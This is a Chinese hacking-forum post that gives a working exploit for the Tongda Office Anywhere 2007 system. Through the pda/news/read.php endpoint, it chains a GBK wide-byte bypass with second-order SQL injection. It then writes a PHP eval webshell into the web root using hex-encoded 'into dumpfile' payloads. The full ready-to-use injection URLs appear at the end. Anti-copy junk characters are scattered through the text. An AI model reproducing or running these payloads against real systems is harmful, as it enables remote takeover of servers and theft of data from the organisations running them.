找回密码
 立即注册
查看: 3051|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本/ _# `2 ~' z8 R# `/ r

8 C! j) u/ \* `4 y7 t! X3 K
7 m5 p8 n; M5 b4 t' b4 s; ^Office Anywhere 2007 网络智能办公系统: Q8 g6 u- E$ S, u

  t; K9 H3 n* w6 b& I1 Xhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..6 s8 a2 N1 h  h' p

3 X3 E5 I! {8 P, ]$ P/ K9 g 5 S1 B# L/ p& _+ t
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
% w- y# E5 y4 c9 u. y ' k0 H! u) E- l6 r" i
例如:SELECT * from USER where USER_ID='{$USERNAME}'  $ b% P) n4 D0 _: u8 z+ m) B% T2 W
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了- S2 ~0 A* Z$ m4 g6 y* k

1 a5 \  m! J; q8 s( o9 ~. n这个时候我们是不是可以组合起来使用哪?" {& v) j7 _% A2 n
8 [  j1 ], V, p. v! E+ g( j9 y' Q
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
  Y" N& l: \% b8 f' G, z3 t4 j% z/ Munion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
3 Y$ o/ D* F$ p; z- G. \ ' Z$ _2 P. H$ @1 S& \
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了8 Z0 _* y( M; c" h+ c) S3 _3 p

3 v* a0 S* K8 x# O2 _+ f那么问题来了,单引号可以吗?当然是不可以的,^_^。。。2 U+ V( d5 B( y4 ~3 G) Q( j

% c7 G; j1 ~& i; B那么我们用字符串格式带入进行hex编码
+ a+ G# T6 I0 t6 `) L! T
2 k" X& y. m4 p7 Z* c% c, \%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
* \' J, c9 e# ~1 |  b& q
. |1 h+ Q! r4 ~1 L$ ~1 V测试ok,获取oa的webshell
1 L3 u) p! ?: h9 A+ x 4 b1 n* o$ ?/ ?8 H# u
# u5 o9 ~+ r9 D6 T
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23- B- H) F/ l) F
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表